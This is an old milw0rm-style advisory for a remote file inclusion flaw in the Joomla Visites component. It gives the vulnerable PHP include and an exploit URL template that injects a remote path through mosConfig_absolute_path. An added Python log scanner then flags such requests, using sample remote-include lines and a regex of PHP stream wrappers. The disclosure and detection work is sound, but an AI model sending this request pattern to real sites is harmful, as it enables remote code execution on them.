/===============================================================================================================================================\
| |
| [o] Joomla Visites 1.1 RC2 Remote File Inclusion Vulnerability |
| |
| Software : com_joomla-visites version 1.1 RC2 |
| Vendor : http://www.joomla-visites.net/ |
| Author : NoGe |
| Contact : noge[dot]code[at]gmail[dot]com |
| |
|===============================================================================================================================================|
| |
| [o] Vulnerable file |
| |
| administrator/components/com_joomla-visites/core/include/myMailer.class.php |
| |
| require_once $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php'; |
| |
| [o] Exploit |
| |
| http://localhost/[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode] |
| |
|===============================================================================================================================================|
| |
| [o] Greetz |
| |
| all crew #papuahacker #nyubicrew #baliemhackerlink |
| skulmatic olibekas ulga Cungkee nyubi k1tk4t LoCK3R culun_borneo |
| yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ str0ke |
| http://kapukvalley.net member |
| |
\===============================================================================================================================================/

# milw0rm.com [2008-04-25]
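
Added example (not part of the original advisory): a log check for the request pattern shown under "Exploit", flagging any request that supplies mosConfig_absolute_path as a query parameter. The combined log format, the sample lines and the names classify, scan, VULN and SAMPLE_LOG are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of a combined-format access log entry (the format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Server-side path variable from the advisory; never a legitimate request parameter.
CONFIG_PARAM = "mosConfig_absolute_path"
# Values that would make include/require go through a PHP stream wrapper.
WRAPPER_RE = re.compile(r"^\s*(?:(?:https?|ftps?|php|expect)://|data:)", re.I)

# Constructed sample lines (documentation addresses, .invalid host), not real traffic.
VULN = "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Apr/2008:10:00:01 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120',
    '192.0.2.44 - - [25/Apr/2008:10:00:07 +0000] "GET ' + VULN
    + '?mosConfig_absolute_path=http%3A%2F%2Fhost.invalid%2Fx.txt HTTP/1.1" 200 312',
    '192.0.2.51 - - [25/Apr/2008:10:01:30 +0000] "GET ' + VULN
    + '?mosConfig_absolute_path=/tmp/ HTTP/1.1" 500 0',
]


def classify(line):
    """Return None, 'override' or 'remote-include' for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    verdict = None
    # parse_qsl percent-decodes once, as PHP does when it populates request variables.
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        if name != CONFIG_PARAM:
            continue
        if WRAPPER_RE.search(value):
            return "remote-include"
        verdict = "override"
    return verdict


def scan(lines):
    """Return (line_number, verdict) for every flagged line, numbering from 1."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits


if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

Parameters sent in a POST body do not appear in access logs, so this check covers query-string requests only.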